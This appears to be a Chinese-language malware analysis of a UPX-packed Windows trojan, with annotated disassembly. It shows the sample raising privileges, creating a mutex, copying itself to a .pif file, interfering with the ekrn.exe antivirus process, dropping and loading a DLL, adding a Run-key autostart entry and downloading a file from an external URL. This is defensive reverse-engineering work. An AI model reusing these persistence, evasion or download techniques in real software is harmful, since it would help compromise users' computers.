文件名称:9648c7cc2f01d7b67718cb89a48d927e
文件哈希:9648c7cc2f01d7b67718cb89a48d927e
文件大小:31528字节
创建时间:2012-04-13 02:01:37
文件类型:EXE
PEID信息:UPX 2.93 (LZMA) [Overlay] *
可能受到威胁的系统:
windows
详细分析/功能介绍
1.upx解压缩执行原程序
2.提升进程权限,创建互斥体
3保存自身到文件
4释放dll加载dll,修改
注册表使dll自启动
5下载文件 "
http://c.shidaihuabian.com/s.gif" >> "%windir%tempolm.ini"
提升进程权限,创建互斥体,跳转到主体部分
部分反汇编代码
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:00401820 push ebp
CODE:00401821 mov ebp, esp
CODE:00401823 sub esp, 174h
CODE:00401829 push ebx
CODE:0040182A push esi
CODE:0040182B push 1
CODE:0040182D call _Rtladjustprivilege ; 提升整个进程的权限至14h
CODE:00401832 push 104h
CODE:00401837 push offset modulepath
CODE:0040183C push 0
CODE:0040183E call _getmodulefilename ; 返回当前程序的路径
CODE:00401843 add esp, 10h
CODE:00401846 mov al, 's'
CODE:00401848 mov [ebp+var_10], al
CODE:0040184B mov [ebp+var_42], al
CODE:0040184E push offset Name ; "KAIFAONGQUMEIGANDE"
CODE:00401853 mov bl, 'e'
CODE:00401855 mov al, 'E'
CODE:00401857 push 0 ; bInitialOwner
CODE:00401859 push 0 ; lpMutexAttributes
CODE:0040185B mov [ebp+var_8], 'o'
CODE:0040185F mov [ebp+var_7], 'p'
CODE:00401863 mov [ebp+var_6], bl ; e
CODE:00401866 mov [ebp+var_5], 'n'
CODE:0040186A mov [ebp+var_4], 0
CODE:0040186E mov [ebp+var_F], 'c'
CODE:00401872 mov [ebp+var_E], '.'
CODE:00401876 mov [ebp+var_D], bl ; e
CODE:00401879 mov [ebp+var_C], 'x'
CODE:0040187D mov [ebp+var_B], bl ; e
CODE:00401880 mov [ebp+var_A], 0
CODE:00401884 mov [ebp+var_44], 't'
CODE:00401888 mov [ebp+var_43], 'a'
CODE:0040188C mov [ebp+var_41], 'k'
CODE:00401890 mov [ebp+var_40], 'k'
CODE:00401894 mov [ebp+var_3F], 'i'
CODE:00401898 mov [ebp+var_3E], 'l'
CODE:0040189C mov [ebp+var_3D], 'l'
CODE:004018A0 mov [ebp+var_3C], '.'
CODE:004018A4 mov [ebp+var_3B], bl ; e
CODE:004018A7 mov [ebp+var_3A], 78h
CODE:004018AB mov [ebp+var_39], bl ; e
CODE:004018AE mov [ebp+var_38], 0
CODE:004018B2 mov [ebp+var_28], bl ; e
CODE:004018B5 mov [ebp+var_27], 'k'
CODE:004018B9 mov [ebp+var_26], 'r'
CODE:004018BD mov [ebp+var_25], 'n'
CODE:004018C1 mov [ebp+var_24], '.'
CODE:004018C5 mov [ebp+var_23], al ; E
CODE:004018C8 mov [ebp+var_22], 'X'
CODE:004018CC mov [ebp+var_21], al ; E
CODE:004018CF mov [ebp+var_20], 0
CODE:004018D3 call CreateMutexA ; 创建互斥体
CODE:004018D9 mov esi, eax
CODE:004018DB nop
CODE:004018DC nop
CODE:004018DD nop
CODE:004018DE nop
CODE:004018DF nop
CODE:004018E0 call GetLastError
CODE:004018E6 cmp eax, 0B7h
CODE:004018EB jnz short @mainpart ; 如果互斥体不存在那么说明没有同样的进程正在运行跳转运行程序
CODE:004018ED push esi
CODE:004018EE call _closehandle
CODE:004018F3 add esp, 4
CODE:004018F6 nop
CODE:004018F7 nop
CODE:004018F8 nop
CODE:004018F9 nop
CODE:004018FA push 0 ; uType
CODE:004018FC push offset Caption ; "0"
CODE:00401901 push offset Caption ; "0"
CODE:00401906 push 0FFFFFFFFh ; hWnd
CODE:00401908 call MessageBoxA
CODE:0040190E push 0 ; uExitCode
CODE:00401910 call ExitProcess
CODE:00401916 ; ---------------------------------------------------------------------------
劫持ekrn.exe 释放c:/programfile/common file//rgdltecq//nhoifz.pif跳转到释放dll的部分
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:004019BB call sub_4028D0 ; 获取ekrn.exe ID
CODE:004019C0 add esp, 4
CODE:004019C3 cmp eax, 1
CODE:004019C6 jbe short loc_401A2A ; 如果没有开启ekrn.exe跳转 开启先进行处理
CODE:004019C8 push 0
CODE:004019CA lea ecx, [ebp+var_50]
CODE:004019CD push 0
CODE:004019CF lea edx, [ebp+var_10]
CODE:004019D2 push ecx
CODE:004019D3 lea eax, [ebp+var_8]
CODE:004019D6 push edx
CODE:004019D7 push eax
CODE:004019D8 push 0
CODE:004019DA call sub_4027A0
CODE:004019DF push 1F4h
CODE:004019E4 call _Sleep
CODE:004019E9 push 0
CODE:004019EB lea ecx, [ebp+var_60]
CODE:004019EE push 0
CODE:004019F0 lea edx, [ebp+var_44]
CODE:004019F3 push ecx
CODE:004019F4 lea eax, [ebp+var_8]
CODE:004019F7 push edx
CODE:004019F8 push eax
CODE:004019F9 push 0
CODE:004019FB call sub_4027A0
CODE:00401A00 push 1F4h
CODE:00401A05 call _Sleep
CODE:00401A0A nop
CODE:00401A0B nop
CODE:00401A0C nop
CODE:00401A0D nop
CODE:00401A0E nop
CODE:00401A0F nop
CODE:00401A10 push 0
CODE:00401A12 lea ecx, [ebp+var_70]
CODE:00401A15 push 0
CODE:00401A17 lea edx, [ebp+var_44]
CODE:00401A1A push ecx
CODE:00401A1B lea eax, [ebp+var_8]
CODE:00401A1E push edx
CODE:00401A1F push eax
CODE:00401A20 push 0
CODE:00401A22 call sub_4027A0
CODE:00401A27 add esp, 50h
CODE:00401A2A
CODE:00401A2A loc_401A2A: ; CODE XREF: start+1A6j
CODE:00401A2A push edi
CODE:00401A2B mov ecx, 40h
CODE:00401A30 xor eax, eax
CODE:00401A32 lea edi, [ebp+var_173]
CODE:00401A38 mov [ebp+floderpath], 0
CODE:00401A3F push 1 ; 如果不存在创建
CODE:00401A41 rep stosd
CODE:00401A43 stosw
CODE:00401A45 lea ecx, [ebp+floderpath]
CODE:00401A4B push 2Bh ; c:/programfile/common file
CODE:00401A4D push ecx
CODE:00401A4E push 0
CODE:00401A50 stosb ; 43字节全为0
CODE:00401A51 call _SHGetSpecialFloderPath ; 获取上面的路径 如果文件不存在创建新的
CODE:00401A56 mov esi, lstrcat
CODE:00401A5C add esp, 10h
CODE:00401A5F lea edx, [ebp+floderpath]
CODE:00401A65 mov [ebp+Caption], 'r'
CODE:00401A69 push offset asc_41D8C8 ; "\"
CODE:00401A6E push edx
CODE:00401A6F mov [ebp+var_1B], 'g'
CODE:00401A73 mov [ebp+var_1A], 'd'
CODE:00401A77 mov [ebp+var_19], 'l'
CODE:00401A7B mov [ebp+var_18], 't'
CODE:00401A7F mov [ebp+var_17], bl ; e
CODE:00401A82 mov [ebp+var_16], 'c'
CODE:00401A86 mov [ebp+var_15], 'q'
CODE:00401A8A mov [ebp+var_14], 0
CODE:00401A8E call esi ; lstrcat
CODE:00401A90 lea eax, [ebp+Caption]
CODE:00401A93 lea ecx, [ebp+floderpath]
CODE:00401A99 push eax
CODE:00401A9A push ecx
CODE:00401A9B call esi ; lstrcat
CODE:00401A9D lea edx, [ebp+Caption]
CODE:00401AA0 push 0 ; uType
CODE:00401AA2 lea eax, [ebp+floderpath]
CODE:00401AA8 push edx ; lpCaption rgdltecq
CODE:00401AA9 push eax ; lpText c:/programfile/common file//rgdltecq
CODE:00401AAA push 0FFFFFFFFh ; hWnd
CODE:00401AAC call MessageBoxA
CODE:00401AB2 lea ecx, [ebp+floderpath]
CODE:00401AB8 push 0
CODE:00401ABA push ecx
CODE:00401ABB call _CreateDirectory ; 创建文件夹c:/programfile/common file//rgdltecq
CODE:00401AC0 add esp, 8
CODE:00401AC3 lea edx, [ebp+floderpath]
CODE:00401AC9 mov [ebp+var_34], 'n'
CODE:00401ACD mov [ebp+var_33], 'h'
CODE:00401AD1 push offset asc_41D8C8 ; "\"
CODE:00401AD6 push edx
CODE:00401AD7 mov [ebp+var_32], 'o'
CODE:00401ADB mov [ebp+var_31], 'i'
CODE:00401ADF mov [ebp+var_30], 'f'
CODE:00401AE3 mov [ebp+var_2F], 'z'
CODE:00401AE7 mov [ebp+var_2E], '.'
CODE:00401AEB mov [ebp+var_2D], 'p'
CODE:00401AEF mov [ebp+var_2C], 'i'
CODE:00401AF3 mov [ebp+var_2B], 'f'
CODE:00401AF7 mov [ebp+var_2A], 0
CODE:00401AFB call esi ; lstrcat
CODE:00401AFD lea eax, [ebp+var_34]
CODE:00401B00 lea ecx, [ebp+floderpath]
CODE:00401B06 push eax
CODE:00401B07 push ecx
CODE:00401B08 call esi ; lstrcat
CODE:00401B0A lea edx, [ebp+floderpath] ; c:/programfile/common file//rgdltecq//nhoifz.pif
CODE:00401B10 push 0
CODE:00401B12 push edx
CODE:00401B13 push offset modulepath
CODE:00401B18 call _copyfilename ; 把当前文件复制到上面的路径
CODE:00401B1D push 0FA0h
CODE:00401B22 call _Sleep
CODE:00401B27 add esp, 10h
CODE:00401B2A call loc_4015B0
CODE:00401B2F pop edi
CODE:00401B30 pop esi
CODE:00401B31 mov eax, 1
CODE:00401B36 pop ebx
CODE:00401B37 mov esp, ebp
CODE:00401B39 pop ebp
CODE:00401B3A retn
CODE:00401B3A start endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------
释放dll,加载dll修改注册表开机自动加载dll。分析这一部分花费了好长时间的dll部分等下次吧
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:004015B0 loc_4015B0: ; CODE XREF: start+30Ap
CODE:004015B0 push ebp
CODE:004015B1 mov ebp, esp
CODE:004015B3 sub esp, 1E0h
CODE:004015B9 push ebx
CODE:004015BA push esi
CODE:004015BB push edi
CODE:004015BC nop
CODE:004015BD nop
CODE:004015BE nop
CODE:004015BF nop
CODE:004015C0 jb short loc_4015C5
CODE:004015C2 jnb short loc_4015C5
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4 db 0E8h ; ?
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5: ; CODE XREF: CODE:004015C0j
CODE:004015C5 ; CODE:004015C2j
CODE:004015C5 mov ecx, 40h
CODE:004015CA xor eax, eax
CODE:004015CC lea edi, [ebp-14Bh]
CODE:004015D2 mov byte ptr [ebp-14Ch], 0
CODE:004015D9 rep stosd
CODE:004015DB stosw
CODE:004015DD stosb ; 从-14Bh开始43h个字节置0
CODE:004015DE lea eax, [ebp-14Ch]
CODE:004015E4 push 104h
CODE:004015E9 push eax
CODE:004015EA call _getsystemdirectory ; 获取系统目录
CODE:004015EF xor ecx, ecx
CODE:004015F1 add esp, 8
CODE:004015F4 mov [ebp-47h], ecx
CODE:004015F7 mov byte ptr [ebp-48h], 0
CODE:004015FB mov [ebp-43h], cx
CODE:004015FF mov [ebp-41h], cl
CODE:00401602 call GetTickCount
CODE:00401608 push eax
CODE:00401609 lea edx, [ebp-48h]
CODE:0040160C push offset aD_dll ; "
\%d.DLL"
CODE:00401611 push edx
CODE:00401612 call wsprintfA ; systemruntime.dll
CODE:00401618 lea edi, [ebp-48h]
CODE:0040161B or ecx, 0FFFFFFFFh
CODE:0040161E xor eax, eax
CODE:00401620 add esp, 0Ch
CODE:00401623 repne scasb
CODE:00401625 not ecx
CODE:00401627 sub edi, ecx
CODE:00401629 lea edx, [ebp-14Ch]
CODE:0040162F mov esi, edi
CODE:00401631 mov ebx, ecx
CODE:00401633 mov edi, edx
CODE:00401635 or ecx, 0FFFFFFFFh
CODE:00401638 repne scasb
CODE:0040163A mov ecx, ebx
CODE:0040163C dec edi
CODE:0040163D shr ecx, 2
CODE:00401640 rep movsd
CODE:00401642 push eax
CODE:00401643 mov ecx, ebx
CODE:00401645 lea eax, [ebp-14Ch] ; %system%systemruntime.dll
CODE:0040164B and ecx, 3
CODE:0040164E push eax
CODE:0040164F push offset a1 ; "1"
CODE:00401654 rep movsb
CODE:00401656 push 0FFFFFFFFh
CODE:00401658 call MessageBoxA
CODE:0040165E lea ecx, [ebp-14Ch]
CODE:00401664 push ecx
CODE:00401665 call @releaseDLL
CODE:0040166A add esp, 4
CODE:0040166D test al, al
CODE:0040166F jz loc_401803 ; dll释放失败 跳转结束
CODE:00401675 push 1388h
CODE:0040167A call _Sleep
CODE:0040167F add esp, 4
CODE:00401682 lea edx, [ebp-14Ch]
CODE:00401688 push edx
CODE:00401689 call LoadLibraryA ; 加载刚写的dll
CODE:0040168F mov esi, eax
CODE:00401691 test esi, esi
CODE:00401693 jz loc_401803
CODE:00401699 mov edi, GetPro
caddress
CODE:0040169F lea eax, [ebp-8]
CODE:004016A2 mov bl, 'r'
CODE:004016A4 push eax
CODE:004016A5 push esi
CODE:004016A6 mov byte ptr [ebp-8], 'W'
CODE:004016AA mov byte ptr [ebp-7], 'h'
CODE:004016AE mov byte ptr [ebp-6], 'a'
CODE:004016B2 mov byte ptr [ebp-5], 'i'
CODE:004016B6 mov byte ptr [ebp-4], 'e'
CODE:004016BA mov [ebp-3], bl
CODE:004016BD mov byte ptr [ebp-2], 0
CODE:004016C1 call edi ; GetProcAddress ; whaier
CODE:004016C3 push 0
CODE:004016C5 call eax ; 加载被释放的dll的whaier函数
CODE:004016C7 push 1388h
CODE:004016CC call _Sleep
CODE:004016D1 add esp, 8
CODE:004016D4 lea ecx, [ebp-10h]
CODE:004016D7 mov byte ptr [ebp-10h], 'S'
CODE:004016DB mov byte ptr [ebp-0Fh], 'i'
CODE:004016DF push ecx
CODE:004016E0 push esi
CODE:004016E1 mov byte ptr [ebp-0Eh], 'm'
CODE:004016E5 mov byte ptr [ebp-0Dh], 'e'
CODE:004016E9 mov byte ptr [ebp-0Ch], 'n'
CODE:004016ED mov byte ptr [ebp-0Bh], 'z'
CODE:004016F1 mov byte ptr [ebp-0Ah], 'e'
CODE:004016F5 mov byte ptr [ebp-9], 0
CODE:004016F9 call edi ; GetProcAddress ; simenze
CODE:004016FB push 0
CODE:004016FD call eax
CODE:004016FF add esp, 4
CODE:00401702 lea edx, [ebp-1E0h]
CODE:00401708 mov d
word ptr [ebp-1E0h], 94h
CODE:00401712 push edx
CODE:00401713 call GetVersionExA
CODE:00401719 cmp d
word ptr [ebp-1DCh], 6
CODE:00401720 jnb short loc_401736 ; windows版本在98以上
CODE:00401722 lea eax, [ebp-14Ch]
CODE:00401728 push eax
CODE:00401729 call @change_reg2
CODE:0040172E add esp, 4
CODE:00401731 jmp loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736: ; CODE XREF: CODE:00401720j
CODE:00401736 call @change_reg ; 更改 注册表提升权限是
病毒更
安全CODE:0040173B mov cl, ''
CODE:0040173D push offset modulepath
CODE:00401742 mov [ebp-38h], cl
CODE:00401745 mov [ebp-2Eh], cl
CODE:00401748 mov [ebp-26h], cl
CODE:0040174B mov [ebp-17h], cl
CODE:0040174E lea ecx, [ebp-40h]
CODE:00401751 push offset a360se ; "360se"
CODE:00401756 mov al, 'o'
CODE:00401758 mov dl, 's'
CODE:0040175A push ecx
CODE:0040175B push 80000002h
CODE:00401760 mov byte ptr [ebp-40h], 'S'
CODE:00401764 mov [ebp-3Fh], al ; o
CODE:00401767 mov byte ptr [ebp-3Eh], 'f'
CODE:0040176B mov byte ptr [ebp-3Dh], 't'
CODE:0040176F mov byte ptr [ebp-3Ch], 'w'
CODE:00401773 mov byte ptr [ebp-3Bh], 'a'
CODE:00401777 mov [ebp-3Ah], bl ; r
CODE:0040177A mov byte ptr [ebp-39h], 'e'
CODE:0040177E mov byte ptr [ebp-37h], 'M'
CODE:00401782 mov byte ptr [ebp-36h], 'i'
CODE:00401786 mov byte ptr [ebp-35h], 'c'
CODE:0040178A mov [ebp-34h], bl ; r
CODE:0040178D mov [ebp-33h], al ; o
CODE:00401790 mov [ebp-32h], dl ; s
CODE:00401793 mov [ebp-31h], al ; o
CODE:00401796 mov byte ptr [ebp-30h], 'f'
CODE:0040179A mov byte ptr [ebp-2Fh], 't'
CODE:0040179E mov byte ptr [ebp-2Dh], 'W'
CODE:004017A2 mov byte ptr [ebp-2Ch], 'i'
CODE:004017A6 mov byte ptr [ebp-2Bh], 'n'
CODE:004017AA mov byte ptr [ebp-2Ah], 'd'
CODE:004017AE mov [ebp-29h], al ; o
CODE:004017B1 mov byte ptr [ebp-28h], 'w'
CODE:004017B5 mov [ebp-27h], dl ; s
CODE:004017B8 mov byte ptr [ebp-25h], 'C'
CODE:004017BC mov byte ptr [ebp-24h], 'u'
CODE:004017C0 mov [ebp-23h], bl ; r
CODE:004017C3 mov [ebp-22h], bl ; r
CODE:004017C6 mov byte ptr [ebp-21h], 'e'
CODE:004017CA mov byte ptr [ebp-20h], 'n'
CODE:004017CE mov byte ptr [ebp-1Fh], 't'
CODE:004017D2 mov byte ptr [ebp-1Eh], 'V'
CODE:004017D6 mov byte ptr [ebp-1Dh], 'e'
CODE:004017DA mov [ebp-1Ch], bl
CODE:004017DD mov [ebp-1Bh], dl
CODE:004017E0 mov byte ptr [ebp-1Ah], 'i'
CODE:004017E4 mov [ebp-19h], al
CODE:004017E7 mov byte ptr [ebp-18h], 'n'
CODE:004017EB mov byte ptr [ebp-16h], 'R'
CODE:004017EF mov byte ptr [ebp-15h], 'u'
CODE:004017F3 mov byte ptr [ebp-14h], 'n'
CODE:004017F7 mov byte ptr [ebp-13h], 0
CODE:004017FB call loc_4014B0
CODE:00401800 add esp, 10h
CODE:00401803
CODE:00401803 loc_401803: ; CODE XREF: CODE:0040166Fj
CODE:00401803 ; CODE:00401693j ...
CODE:00401803 push 2710h
CODE:00401808 call Sleep
CODE:0040180E pop edi
CODE:0040180F pop esi
CODE:00401810 mov eax, 1
CODE:00401815 pop ebx
CODE:00401816 mov esp, ebp
CODE:00401818 pop ebp
CODE:00401819 retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A align 10h
CODE:00401820
作者 麦小扣
